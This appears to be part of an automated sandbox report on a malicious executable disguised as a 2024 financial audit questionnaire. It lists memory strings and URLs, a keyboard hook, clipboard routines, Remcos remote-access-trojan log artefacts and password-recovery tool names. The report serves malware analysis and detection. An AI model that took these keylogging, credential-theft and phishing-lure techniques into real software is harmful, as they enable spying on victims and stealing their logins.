              Source: bhv8781.tmp.12.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv8781.tmp.12.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv8781.tmp.12.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv8781.tmp.12.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv8781.tmp.12.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: bhv8781.tmp.12.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv8781.tmp.12.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv8781.tmp.12.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv8781.tmp.12.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv8781.tmp.12.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv8781.tmp.12.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv8781.tmp.12.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv8781.tmp.12.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv8781.tmp.12.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv8781.tmp.12.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv8781.tmp.12.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
              Source: bhv8781.tmp.12.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
              Source: bhv8781.tmp.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
              Source: bhv8781.tmp.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv8781.tmp.12.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv8781.tmp.12.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv8781.tmp.12.drString found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00405373 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405373
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2936, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,9_2_0040335A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_004065E10_2_004065E1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00404BB00_2_00404BB0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_004065E19_2_004065E1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_00404BB09_2_00404BB0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_3356B5C19_2_3356B5C1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_335771949_2_33577194
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044B04012_2_0044B040
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0043610D12_2_0043610D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044731012_2_00447310
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044A49012_2_0044A490
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040755A12_2_0040755A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0043C56012_2_0043C560
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044B61012_2_0044B610
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044D6C012_2_0044D6C0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_004476F012_2_004476F0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044B87012_2_0044B870
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044081D12_2_0044081D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0041495712_2_00414957
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_004079EE12_2_004079EE
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00407AEB12_2_00407AEB
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044AA8012_2_0044AA80
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00412AA912_2_00412AA9
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00404B7412_2_00404B74
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00404B0312_2_00404B03
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044BBD812_2_0044BBD8
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00404BE512_2_00404BE5
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00404C7612_2_00404C76
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00415CFE12_2_00415CFE
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00416D7212_2_00416D72
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00446D3012_2_00446D30
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00446D8B12_2_00446D8B
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00406E8F12_2_00406E8F
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0040503813_2_00405038
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0041208C13_2_0041208C
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004050A913_2_004050A9
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0040511A13_2_0040511A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0043C13A13_2_0043C13A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004051AB13_2_004051AB
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044930013_2_00449300
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0040D32213_2_0040D322
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044A4F013_2_0044A4F0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0043A5AB13_2_0043A5AB
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0041363113_2_00413631
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044669013_2_00446690
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044A73013_2_0044A730
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004398D813_2_004398D8
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004498E013_2_004498E0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044A88613_2_0044A886
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0043DA0913_2_0043DA09
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00438D5E13_2_00438D5E
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00449ED013_2_00449ED0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0041FE8313_2_0041FE83
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00430F5413_2_00430F54
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004050C214_2_004050C2
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004014AB14_2_004014AB
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_0040513314_2_00405133
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004051A414_2_004051A4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_0040124614_2_00401246
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_0040CA4614_2_0040CA46
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_0040523514_2_00405235
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004032C814_2_004032C8
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004222D914_2_004222D9
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_0040168914_2_00401689
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00402F6014_2_00402F60
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: String function: 00402B3A appears 51 times
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000000.00000000.2156380584.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000003.2666885329.00000000025E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.000000003354B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000003.2693210622.00000000025F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000003.2693115582.00000000025F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000003.2662997089.0000000032F11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeBinary or memory string: OriginalFileName vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000000.2667238469.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000D.00000000.2668172518.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeBinary or memory string: OriginalFilename vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000000.2670210083.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
